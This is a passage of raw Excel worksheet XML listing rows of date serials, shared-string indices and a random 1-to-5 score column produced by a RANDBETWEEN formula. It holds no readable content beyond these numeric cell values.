        <v>42900.162974537037</v>
      </c>
      <c r="C26960" t="s">
        <v>103</v>
      </c>
      <c r="E26960" s="2" t="s">
        <v>24523</v>
      </c>
      <c r="F26960">
        <f t="shared" ca="1" si="421"/>
        <v>4</v>
      </c>
    </row>
    <row r="26961" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26961" s="1">
        <v>42900.162407407406</v>
      </c>
      <c r="C26961" t="s">
        <v>118</v>
      </c>
      <c r="E26961" t="s">
        <v>24524</v>
      </c>
      <c r="F26961">
        <f t="shared" ca="1" si="421"/>
        <v>3</v>
      </c>
    </row>
    <row r="26962" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A26962" s="1">
        <v>42900.156828703701</v>
      </c>
      <c r="C26962" t="s">
        <v>559</v>
      </c>
      <c r="E26962" s="2" t="s">
        <v>24525</v>
      </c>
      <c r="F26962">
        <f t="shared" ca="1" si="421"/>
        <v>2</v>
      </c>
    </row>
    <row r="26963" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26963" s="1">
        <v>42900.060844907406</v>
      </c>
      <c r="C26963" t="s">
        <v>41</v>
      </c>
      <c r="E26963" t="s">
        <v>24526</v>
      </c>
      <c r="F26963">
        <f t="shared" ca="1" si="421"/>
        <v>5</v>
      </c>
    </row>
    <row r="26964" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26964" s="1">
        <v>42900.041620370372</v>
      </c>
      <c r="C26964" t="s">
        <v>301</v>
      </c>
      <c r="E26964" t="s">
        <v>24527</v>
      </c>
      <c r="F26964">
        <f t="shared" ca="1" si="421"/>
        <v>4</v>
      </c>
    </row>
    <row r="26965" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26965" s="1">
        <v>42899.78634259259</v>
      </c>
      <c r="C26965" t="s">
        <v>10</v>
      </c>
      <c r="D26965" t="s">
        <v>6</v>
      </c>
      <c r="E26965" t="s">
        <v>24528</v>
      </c>
      <c r="F26965">
        <f t="shared" ca="1" si="421"/>
        <v>4</v>
      </c>
    </row>
    <row r="26966" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26966" s="1">
        <v>42899.783356481479</v>
      </c>
      <c r="C26966" t="s">
        <v>10</v>
      </c>
      <c r="D26966" t="s">
        <v>6</v>
      </c>
      <c r="E26966" t="s">
        <v>24529</v>
      </c>
      <c r="F26966">
        <f t="shared" ca="1" si="421"/>
        <v>3</v>
      </c>
    </row>
    <row r="26967" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A26967" s="1">
        <v>42899.772847222222</v>
      </c>
      <c r="C26967" t="s">
        <v>10</v>
      </c>
      <c r="D26967" t="s">
        <v>6</v>
      </c>
      <c r="E26967" s="2" t="s">
        <v>24530</v>
      </c>
      <c r="F26967">
        <f t="shared" ca="1" si="421"/>
        <v>3</v>
      </c>
    </row>
    <row r="26968" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A26968" s="1">
        <v>42899.772662037038</v>
      </c>
      <c r="C26968" t="s">
        <v>260</v>
      </c>
      <c r="E26968" s="2" t="s">
        <v>24531</v>
      </c>
      <c r="F26968">
        <f t="shared" ca="1" si="421"/>
        <v>3</v>
      </c>
    </row>
    <row r="26969" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26969" s="1">
        <v>42899.768541666665</v>
      </c>
      <c r="C26969" t="s">
        <v>140</v>
      </c>
      <c r="D26969" t="s">
        <v>234</v>
      </c>
      <c r="E26969" t="s">
        <v>24532</v>
      </c>
      <c r="F26969">
        <f t="shared" ca="1" si="421"/>
        <v>2</v>
      </c>
    </row>
    <row r="26970" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A26970" s="1">
        <v>42899.749016203707</v>
      </c>
      <c r="C26970" t="s">
        <v>535</v>
      </c>
      <c r="E26970" s="2" t="s">
        <v>24533</v>
      </c>
      <c r="F26970">
        <f t="shared" ca="1" si="421"/>
        <v>3</v>
      </c>
    </row>
    <row r="26971" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26971" s="1">
        <v>42899.744039351855</v>
      </c>
      <c r="C26971" t="s">
        <v>10</v>
      </c>
      <c r="D26971" t="s">
        <v>271</v>
      </c>
      <c r="E26971" t="s">
        <v>24534</v>
      </c>
      <c r="F26971">
        <f t="shared" ca="1" si="421"/>
        <v>5</v>
      </c>
    </row>
    <row r="26972" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26972" s="1">
        <v>42899.739537037036</v>
      </c>
      <c r="C26972" t="s">
        <v>10</v>
      </c>
      <c r="D26972" t="s">
        <v>94</v>
      </c>
      <c r="E26972" t="s">
        <v>24535</v>
      </c>
      <c r="F26972">
        <f t="shared" ca="1" si="421"/>
        <v>4</v>
      </c>
    </row>
    <row r="26973" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26973" s="1">
        <v>42899.735046296293</v>
      </c>
      <c r="C26973" t="s">
        <v>10</v>
      </c>
      <c r="D26973" t="s">
        <v>17</v>
      </c>
      <c r="E26973" t="s">
        <v>24536</v>
      </c>
      <c r="F26973">
        <f t="shared" ca="1" si="421"/>
        <v>3</v>
      </c>
    </row>
    <row r="26974" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26974" s="1">
        <v>42899.694328703707</v>
      </c>
      <c r="C26974" t="s">
        <v>10</v>
      </c>
      <c r="D26974" t="s">
        <v>6</v>
      </c>
      <c r="E26974" t="s">
        <v>24537</v>
      </c>
      <c r="F26974">
        <f t="shared" ca="1" si="421"/>
        <v>5</v>
      </c>
    </row>
    <row r="26975" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26975" s="1">
        <v>42899.664282407408</v>
      </c>
      <c r="C26975" t="s">
        <v>10</v>
      </c>
      <c r="D26975" t="s">
        <v>494</v>
      </c>
      <c r="E26975" t="s">
        <v>24538</v>
      </c>
      <c r="F26975">
        <f t="shared" ca="1" si="421"/>
        <v>5</v>
      </c>
    </row>
    <row r="26976" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A26976" s="1">
        <v>42899.65898148148</v>
      </c>
      <c r="C26976" t="s">
        <v>10</v>
      </c>
      <c r="D26976" t="s">
        <v>80</v>
      </c>
      <c r="E26976" s="2" t="s">
        <v>24539</v>
      </c>
      <c r="F26976">
        <f t="shared" ca="1" si="421"/>
        <v>1</v>
      </c>
    </row>
    <row r="26977" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A26977" s="1">
        <v>42899.637152777781</v>
      </c>
      <c r="C26977" t="s">
        <v>6</v>
      </c>
      <c r="D26977" t="s">
        <v>25</v>
      </c>
      <c r="E26977" s="2" t="s">
        <v>24540</v>
      </c>
      <c r="F26977">
        <f t="shared" ca="1" si="421"/>
        <v>5</v>
      </c>
    </row>
    <row r="26978" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26978" s="1">
        <v>42899.600115740737</v>
      </c>
      <c r="C26978" t="s">
        <v>10</v>
      </c>
      <c r="D26978" t="s">
        <v>52</v>
      </c>
      <c r="E26978" t="s">
        <v>24541</v>
      </c>
      <c r="F26978">
        <f t="shared" ca="1" si="421"/>
        <v>1</v>
      </c>
    </row>
    <row r="26979" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26979" s="1">
        <v>42899.599548611113</v>
      </c>
      <c r="C26979" t="s">
        <v>10</v>
      </c>
      <c r="D26979" t="s">
        <v>494</v>
      </c>
      <c r="E26979" t="s">
        <v>24542</v>
      </c>
      <c r="F26979">
        <f t="shared" ca="1" si="421"/>
        <v>2</v>
      </c>
    </row>
    <row r="26980" spans="1:6" ht="405" x14ac:dyDescent="0.25">
      <c r="A26980" s="1">
        <v>42899.572106481479</v>
      </c>
      <c r="C26980" t="s">
        <v>48</v>
      </c>
      <c r="E26980" s="2" t="s">
        <v>24543</v>
      </c>
      <c r="F26980">
        <f t="shared" ca="1" si="421"/>
        <v>2</v>
      </c>
    </row>
    <row r="26981" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26981" s="1">
        <v>42899.561203703706</v>
      </c>
      <c r="C26981" t="s">
        <v>260</v>
      </c>
      <c r="E26981" t="s">
        <v>24544</v>
      </c>
      <c r="F26981">
        <f t="shared" ca="1" si="421"/>
        <v>1</v>
      </c>
    </row>
    <row r="26982" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26982" s="1">
        <v>42899.552754629629</v>
      </c>
      <c r="C26982" t="s">
        <v>6</v>
      </c>
      <c r="D26982" t="s">
        <v>25</v>
      </c>
      <c r="E26982" t="s">
        <v>24545</v>
      </c>
      <c r="F26982">
        <f t="shared" ca="1" si="421"/>
        <v>3</v>
      </c>
    </row>
    <row r="26983" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26983" s="1">
        <v>42899.551701388889</v>
      </c>
      <c r="C26983" t="s">
        <v>10</v>
      </c>
      <c r="D26983" t="s">
        <v>112</v>
      </c>
      <c r="E26983" t="s">
        <v>24546</v>
      </c>
      <c r="F26983">
        <f t="shared" ca="1" si="421"/>
        <v>1</v>
      </c>
    </row>
    <row r="26984" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A26984" s="1">
        <v>42899.545590277776</v>
      </c>
      <c r="C26984" t="s">
        <v>10</v>
      </c>
      <c r="D26984" t="s">
        <v>107</v>
      </c>
      <c r="E26984" s="2" t="s">
        <v>24547</v>
      </c>
      <c r="F26984">
        <f t="shared" ca="1" si="421"/>
        <v>4</v>
      </c>
    </row>
    <row r="26985" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A26985" s="1">
        <v>42899.537476851852</v>
      </c>
      <c r="C26985" t="s">
        <v>10</v>
      </c>
      <c r="D26985" t="s">
        <v>6</v>
      </c>
      <c r="E26985" s="2" t="s">
        <v>24548</v>
      </c>
      <c r="F26985">
        <f t="shared" ca="1" si="421"/>
        <v>3</v>
      </c>
    </row>
    <row r="26986" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A26986" s="1">
        <v>42899.533854166664</v>
      </c>
      <c r="C26986" t="s">
        <v>10</v>
      </c>
      <c r="D26986" t="s">
        <v>36</v>
      </c>
      <c r="E26986" s="2" t="s">
        <v>24549</v>
      </c>
      <c r="F26986">
        <f t="shared" ca="1" si="421"/>
        <v>5</v>
      </c>
    </row>
    <row r="26987" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26987" s="1">
        <v>42899.48914351852</v>
      </c>
      <c r="C26987" t="s">
        <v>6</v>
      </c>
      <c r="D26987" t="s">
        <v>25</v>
      </c>
      <c r="E26987" t="s">
        <v>24550</v>
      </c>
      <c r="F26987">
        <f t="shared" ca="1" si="421"/>
        <v>5</v>
      </c>
    </row>
    <row r="26988" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A26988" s="1">
        <v>42899.4841087963</v>
      </c>
      <c r="C26988" t="s">
        <v>10</v>
      </c>
      <c r="D26988" t="s">
        <v>192</v>
      </c>
      <c r="E26988" s="2" t="s">
        <v>24551</v>
      </c>
      <c r="F26988">
        <f t="shared" ca="1" si="421"/>
        <v>2</v>
      </c>
    </row>
    <row r="26989" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26989" s="1">
        <v>42899.472094907411</v>
      </c>
      <c r="C26989" t="s">
        <v>10</v>
      </c>
      <c r="D26989" t="s">
        <v>56</v>
      </c>
      <c r="E26989" t="s">
        <v>24552</v>
      </c>
      <c r="F26989">
        <f t="shared" ca="1" si="421"/>
        <v>5</v>
      </c>
    </row>
    <row r="26990" spans="1:6" ht="360" x14ac:dyDescent="0.25">
      <c r="A26990" s="1">
        <v>42899.467835648145</v>
      </c>
      <c r="C26990" t="s">
        <v>97</v>
      </c>
      <c r="E26990" s="2" t="s">
        <v>24553</v>
      </c>
      <c r="F26990">
        <f t="shared" ca="1" si="421"/>
        <v>3</v>
      </c>
    </row>
    <row r="26991" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26991" s="1">
        <v>42899.437106481484</v>
      </c>
      <c r="C26991" t="s">
        <v>1130</v>
      </c>
      <c r="E26991" t="s">
        <v>24554</v>
      </c>
      <c r="F26991">
        <f t="shared" ca="1" si="421"/>
        <v>1</v>
      </c>
    </row>
    <row r="26992" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26992" s="1">
        <v>42899.413356481484</v>
      </c>
      <c r="C26992" t="s">
        <v>10</v>
      </c>
      <c r="D26992" t="s">
        <v>89</v>
      </c>
      <c r="E26992" t="s">
        <v>24555</v>
      </c>
      <c r="F26992">
        <f t="shared" ca="1" si="421"/>
        <v>3</v>
      </c>
    </row>
    <row r="26993" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A26993" s="1">
        <v>42899.410034722219</v>
      </c>
      <c r="C26993" t="s">
        <v>103</v>
      </c>
      <c r="E26993" s="2" t="s">
        <v>24556</v>
      </c>
      <c r="F26993">
        <f t="shared" ca="1" si="421"/>
        <v>5</v>
      </c>
    </row>
    <row r="26994" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A26994" s="1">
        <v>42899.39539351852</v>
      </c>
      <c r="C26994" t="s">
        <v>71</v>
      </c>
      <c r="E26994" s="2" t="s">
        <v>24557</v>
      </c>
      <c r="F26994">
        <f t="shared" ca="1" si="421"/>
        <v>3</v>
      </c>
    </row>
    <row r="26995" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26995" s="1">
        <v>42899.36414351852</v>
      </c>
      <c r="C26995" t="s">
        <v>10</v>
      </c>
      <c r="D26995" t="s">
        <v>56</v>
      </c>
      <c r="F26995">
        <f t="shared" ca="1" si="421"/>
        <v>3</v>
      </c>
    </row>
    <row r="26996" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A26996" s="1">
        <v>42899.363877314812</v>
      </c>
      <c r="C26996" t="s">
        <v>10</v>
      </c>
      <c r="D26996" t="s">
        <v>52</v>
      </c>
      <c r="E26996" s="2" t="s">
        <v>24558</v>
      </c>
      <c r="F26996">
        <f t="shared" ca="1" si="421"/>
        <v>5</v>
      </c>
    </row>
    <row r="26997" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A26997" s="1">
        <v>42899.296331018515</v>
      </c>
      <c r="C26997" t="s">
        <v>48</v>
      </c>
      <c r="E26997" s="2" t="s">
        <v>24559</v>
      </c>
      <c r="F26997">
        <f t="shared" ca="1" si="421"/>
        <v>3</v>
      </c>
    </row>
    <row r="26998" spans="1:6" ht="330" x14ac:dyDescent="0.25">
      <c r="A26998" s="1">
        <v>42899.257685185185</v>
      </c>
      <c r="C26998" t="s">
        <v>73</v>
      </c>
      <c r="E26998" s="2" t="s">
        <v>24560</v>
      </c>
      <c r="F26998">
        <f t="shared" ca="1" si="421"/>
        <v>2</v>
      </c>
    </row>
    <row r="26999" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A26999" s="1">
        <v>42899.245011574072</v>
      </c>
      <c r="C26999" t="s">
        <v>10</v>
      </c>
      <c r="D26999" t="s">
        <v>46</v>
      </c>
      <c r="E26999" s="2" t="s">
        <v>24561</v>
      </c>
      <c r="F26999">
        <f t="shared" ca="1" si="421"/>
        <v>3</v>
      </c>
    </row>
    <row r="27000" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27000" s="1">
        <v>42899.188692129632</v>
      </c>
      <c r="C27000" t="s">
        <v>48</v>
      </c>
      <c r="E27000" t="s">
        <v>24562</v>
      </c>
      <c r="F27000">
        <f t="shared" ca="1" si="421"/>
        <v>4</v>
      </c>
    </row>
    <row r="27001" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A27001" s="1">
        <v>42899.161643518521</v>
      </c>
      <c r="C27001" t="s">
        <v>65</v>
      </c>
      <c r="E27001" s="2" t="s">
        <v>24563</v>
      </c>
      <c r="F27001">
        <f t="shared" ca="1" si="421"/>
        <v>1</v>
      </c>
    </row>
    <row r="27002" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A27002" s="1">
        <v>42899.160590277781</v>
      </c>
      <c r="C27002" t="s">
        <v>319</v>
      </c>
      <c r="E27002" s="2" t="s">
        <v>24564</v>
      </c>
      <c r="F27002">
        <f t="shared" ca="1" si="421"/>
        <v>4</v>
      </c>
    </row>
    <row r="27003" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A27003" s="1">
        <v>42899.160567129627</v>
      </c>
      <c r="C27003" t="s">
        <v>319</v>
      </c>
      <c r="E27003" s="2" t="s">
        <v>24564</v>
      </c>
      <c r="F27003">
        <f t="shared" ca="1" si="421"/>
        <v>5</v>
      </c>
    </row>
    <row r="27004" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27004" s="1">
        <v>42899.152430555558</v>
      </c>
      <c r="C27004" t="s">
        <v>41</v>
      </c>
      <c r="E27004" t="s">
        <v>24565</v>
      </c>
      <c r="F27004">
        <f t="shared" ca="1" si="421"/>
        <v>5</v>
      </c>
    </row>
    <row r="27005" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A27005" s="1">
        <v>42899.133969907409</v>
      </c>
      <c r="C27005" t="s">
        <v>686</v>
      </c>
      <c r="E27005" s="2" t="s">
        <v>24566</v>
      </c>
      <c r="F27005">
        <f t="shared" ca="1" si="421"/>
        <v>2</v>
      </c>
    </row>
    <row r="27006" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A27006" s="1">
        <v>42898.999675925923</v>
      </c>
      <c r="C27006" t="s">
        <v>118</v>
      </c>
      <c r="E27006" s="2" t="s">
        <v>24567</v>
      </c>
      <c r="F27006">
        <f t="shared" ca="1" si="421"/>
        <v>3</v>
      </c>
    </row>
    <row r="27007" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27007" s="1">
        <v>42898.762256944443</v>
      </c>
      <c r="C27007" t="s">
        <v>10</v>
      </c>
      <c r="D27007" t="s">
        <v>89</v>
      </c>
      <c r="E27007" t="s">
        <v>24568</v>
      </c>
      <c r="F27007">
        <f t="shared" ca="1" si="421"/>
        <v>5</v>
      </c>
    </row>
    <row r="27008" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27008" s="1">
        <v>42898.75854166667</v>
      </c>
      <c r="C27008" t="s">
        <v>10</v>
      </c>
      <c r="D27008" t="s">
        <v>6</v>
      </c>
      <c r="E27008" t="s">
        <v>24569</v>
      </c>
      <c r="F27008">
        <f t="shared" ca="1" si="421"/>
        <v>3</v>
      </c>
    </row>
    <row r="27009" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27009" s="1">
        <v>42898.739212962966</v>
      </c>
      <c r="C27009" t="s">
        <v>10</v>
      </c>
      <c r="D27009" t="s">
        <v>17</v>
      </c>
      <c r="E27009" t="s">
        <v>24570</v>
      </c>
      <c r="F27009">
        <f t="shared" ca="1" si="421"/>
        <v>1</v>
      </c>
    </row>
    <row r="27010" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27010" s="1">
        <v>42898.704814814817</v>
      </c>
      <c r="C27010" t="s">
        <v>10</v>
      </c>
      <c r="D27010" t="s">
        <v>52</v>
      </c>
      <c r="E27010" t="s">
        <v>24571</v>
      </c>
      <c r="F27010">
        <f t="shared" ref="F27010:F27073" ca="1" si="422">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="27011" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27011" s="1">
        <v>42898.665023148147</v>
      </c>
      <c r="C27011" t="s">
        <v>10</v>
      </c>
      <c r="D27011" t="s">
        <v>89</v>
      </c>
      <c r="F27011">
        <f t="shared" ca="1" si="422"/>
        <v>4</v>
      </c>
    </row>
    <row r="27012" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27012" s="1">
        <v>42898.660983796297</v>
      </c>
      <c r="C27012" t="s">
        <v>10</v>
      </c>
      <c r="D27012" t="s">
        <v>89</v>
      </c>
      <c r="E27012" t="s">
        <v>24572</v>
      </c>
      <c r="F27012">
        <f t="shared" ca="1" si="422"/>
        <v>4</v>
      </c>
    </row>
    <row r="27013" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27013" s="1">
        <v>42898.648819444446</v>
      </c>
      <c r="C27013" t="s">
        <v>10</v>
      </c>
      <c r="D27013" t="s">
        <v>336</v>
      </c>
      <c r="E27013" t="s">
        <v>24573</v>
      </c>
      <c r="F27013">
        <f t="shared" ca="1" si="422"/>
        <v>2</v>
      </c>
    </row>
    <row r="27014" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A27014" s="1">
        <v>42898.630266203705</v>
      </c>
      <c r="C27014" t="s">
        <v>10</v>
      </c>
      <c r="D27014" t="s">
        <v>6</v>
      </c>
      <c r="E27014" s="2" t="s">
        <v>24574</v>
      </c>
      <c r="F27014">
        <f t="shared" ca="1" si="422"/>
        <v>1</v>
      </c>
    </row>
    <row r="27015" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27015" s="1">
        <v>42898.587743055556</v>
      </c>
      <c r="C27015" t="s">
        <v>10</v>
      </c>
      <c r="D27015" t="s">
        <v>86</v>
      </c>
      <c r="E27015" t="s">
        <v>24575</v>
      </c>
      <c r="F27015">
        <f t="shared" ca="1" si="422"/>
        <v>5</v>
      </c>
    </row>
    <row r="27016" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27016" s="1">
        <v>42898.549340277779</v>
      </c>
      <c r="C27016" t="s">
        <v>10</v>
      </c>
      <c r="D27016" t="s">
        <v>107</v>
      </c>
      <c r="E27016" t="s">
        <v>24576</v>
      </c>
      <c r="F27016">
        <f t="shared" ca="1" si="422"/>
        <v>3</v>
      </c>
    </row>
    <row r="27017" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27017" s="1">
        <v>42898.514907407407</v>
      </c>
      <c r="C27017" t="s">
        <v>10</v>
      </c>
      <c r="D27017" t="s">
        <v>20</v>
      </c>
      <c r="E27017" t="s">
        <v>24577</v>
      </c>
      <c r="F27017">
        <f t="shared" ca="1" si="422"/>
        <v>3</v>
      </c>
    </row>
    <row r="27018" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A27018" s="1">
        <v>42898.505532407406</v>
      </c>
      <c r="C27018" t="s">
        <v>10</v>
      </c>
      <c r="D27018" t="s">
        <v>36</v>
      </c>
      <c r="E27018" s="2" t="s">
        <v>24578</v>
      </c>
      <c r="F27018">
        <f t="shared" ca="1" si="422"/>
        <v>3</v>
      </c>
    </row>
    <row r="27019" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27019" s="1">
        <v>42898.504918981482</v>
      </c>
      <c r="C27019" t="s">
        <v>10</v>
      </c>
      <c r="D27019" t="s">
        <v>14</v>
      </c>
      <c r="E27019" t="s">
        <v>24579</v>
      </c>
      <c r="F27019">
        <f t="shared" ca="1" si="422"/>
        <v>5</v>
      </c>
    </row>
    <row r="27020" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A27020" s="1">
        <v>42898.494340277779</v>
      </c>
      <c r="C27020" t="s">
        <v>10</v>
      </c>
      <c r="D27020" t="s">
        <v>80</v>
      </c>
      <c r="E27020" s="2" t="s">
        <v>24580</v>
      </c>
      <c r="F27020">
        <f t="shared" ca="1" si="422"/>
        <v>3</v>
      </c>
    </row>
    <row r="27021" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27021" s="1">
        <v>42898.487581018519</v>
      </c>
      <c r="C27021" t="s">
        <v>10</v>
      </c>
      <c r="D27021" t="s">
        <v>158</v>
      </c>
      <c r="E27021" t="s">
        <v>24581</v>
      </c>
      <c r="F27021">
        <f t="shared" ca="1" si="422"/>
        <v>4</v>
      </c>
    </row>
    <row r="27022" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A27022" s="1">
        <v>42898.484942129631</v>
      </c>
      <c r="C27022" t="s">
        <v>10</v>
      </c>
      <c r="D27022" t="s">
        <v>89</v>
      </c>
      <c r="E27022" s="2" t="s">
        <v>24582</v>
      </c>
      <c r="F27022">
        <f t="shared" ca="1" si="422"/>
        <v>4</v>
      </c>
    </row>
    <row r="27023" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27023" s="1">
        <v>42898.480868055558</v>
      </c>
      <c r="C27023" t="s">
        <v>10</v>
      </c>
      <c r="D27023" t="s">
        <v>23</v>
      </c>
      <c r="E27023" t="s">
        <v>24583</v>
      </c>
      <c r="F27023">
        <f t="shared" ca="1" si="422"/>
        <v>5</v>
      </c>
    </row>
    <row r="27024" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27024" s="1">
        <v>42898.478275462963</v>
      </c>
      <c r="C27024" t="s">
        <v>10</v>
      </c>
      <c r="D27024" t="s">
        <v>494</v>
      </c>
      <c r="E27024" t="s">
        <v>24584</v>
      </c>
      <c r="F27024">
        <f t="shared" ca="1" si="422"/>
        <v>5</v>
      </c>
    </row>
    <row r="27025" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27025" s="1">
        <v>42898.469652777778</v>
      </c>
      <c r="C27025" t="s">
        <v>10</v>
      </c>
      <c r="D27025" t="s">
        <v>56</v>
      </c>
      <c r="E27025" t="s">
        <v>24585</v>
      </c>
      <c r="F27025">
        <f t="shared" ca="1" si="422"/>
        <v>4</v>
      </c>
    </row>
    <row r="27026" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27026" s="1">
        <v>42898.450162037036</v>
      </c>
      <c r="C27026" t="s">
        <v>10</v>
      </c>
      <c r="D27026" t="s">
        <v>17</v>
      </c>
      <c r="E27026" t="s">
        <v>24586</v>
      </c>
      <c r="F27026">
        <f t="shared" ca="1" si="422"/>
        <v>2</v>
      </c>
    </row>
    <row r="27027" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27027" s="1">
        <v>42898.439236111109</v>
      </c>
      <c r="C27027" t="s">
        <v>10</v>
      </c>
      <c r="D27027" t="s">
        <v>178</v>
      </c>
      <c r="E27027" t="s">
        <v>24587</v>
      </c>
      <c r="F27027">
        <f t="shared" ca="1" si="422"/>
        <v>2</v>
      </c>
    </row>
    <row r="27028" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A27028" s="1">
        <v>42898.424780092595</v>
      </c>
      <c r="C27028" t="s">
        <v>6</v>
      </c>
      <c r="D27028" t="s">
        <v>25</v>
      </c>
      <c r="E27028" s="2" t="s">
        <v>24588</v>
      </c>
      <c r="F27028">
        <f t="shared" ca="1" si="422"/>
        <v>4</v>
      </c>
    </row>
    <row r="27029" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27029" s="1">
        <v>42898.416701388887</v>
      </c>
      <c r="C27029" t="s">
        <v>6</v>
      </c>
      <c r="D27029" t="s">
        <v>25</v>
      </c>
      <c r="E27029" t="s">
        <v>24589</v>
      </c>
      <c r="F27029">
        <f t="shared" ca="1" si="422"/>
        <v>1</v>
      </c>
    </row>
    <row r="27030" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27030" s="1">
        <v>42898.416678240741</v>
      </c>
      <c r="C27030" t="s">
        <v>6</v>
      </c>
      <c r="D27030" t="s">
        <v>25</v>
      </c>
      <c r="E27030" t="s">
        <v>24589</v>
      </c>
      <c r="F27030">
        <f t="shared" ca="1" si="422"/>
        <v>3</v>
      </c>
    </row>
    <row r="27031" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A27031" s="1">
        <v>42898.411215277774</v>
      </c>
      <c r="C27031" t="s">
        <v>10</v>
      </c>
      <c r="D27031" t="s">
        <v>494</v>
      </c>
      <c r="E27031" s="2" t="s">
        <v>24590</v>
      </c>
      <c r="F27031">
        <f t="shared" ca="1" si="422"/>
        <v>3</v>
      </c>
    </row>
    <row r="27032" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A27032" s="1">
        <v>42898.410300925927</v>
      </c>
      <c r="C27032" t="s">
        <v>559</v>
      </c>
      <c r="E27032" s="2" t="s">
        <v>24591</v>
      </c>
      <c r="F27032">
        <f t="shared" ca="1" si="422"/>
        <v>5</v>
      </c>
    </row>
    <row r="27033" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27033" s="1">
        <v>42898.392754629633</v>
      </c>
      <c r="C27033" t="s">
        <v>48</v>
      </c>
      <c r="E27033" t="s">
        <v>24592</v>
      </c>
      <c r="F27033">
        <f t="shared" ca="1" si="422"/>
        <v>2</v>
      </c>
    </row>
    <row r="27034" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27034" s="1">
        <v>42898.390798611108</v>
      </c>
      <c r="C27034" t="s">
        <v>10</v>
      </c>
      <c r="D27034" t="s">
        <v>494</v>
      </c>
      <c r="E27034" t="s">
        <v>24593</v>
      </c>
      <c r="F27034">
        <f t="shared" ca="1" si="422"/>
        <v>1</v>
      </c>
    </row>
    <row r="27035" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27035" s="1">
        <v>42898.353946759256</v>
      </c>
      <c r="C27035" t="s">
        <v>41</v>
      </c>
      <c r="E27035" t="s">
        <v>24594</v>
      </c>
      <c r="F27035">
        <f t="shared" ca="1" si="422"/>
        <v>5</v>
      </c>
    </row>
    <row r="27036" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27036" s="1">
        <v>42898.277037037034</v>
      </c>
      <c r="C27036" t="s">
        <v>189</v>
      </c>
      <c r="E27036" t="s">
        <v>24595</v>
      </c>
      <c r="F27036">
        <f t="shared" ca="1" si="422"/>
        <v>2</v>
      </c>
    </row>
    <row r="27037" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A27037" s="1">
        <v>42898.276782407411</v>
      </c>
      <c r="C27037" t="s">
        <v>71</v>
      </c>
      <c r="E27037" s="2" t="s">
        <v>24596</v>
      </c>
      <c r="F27037">
        <f t="shared" ca="1" si="422"/>
        <v>5</v>
      </c>
    </row>
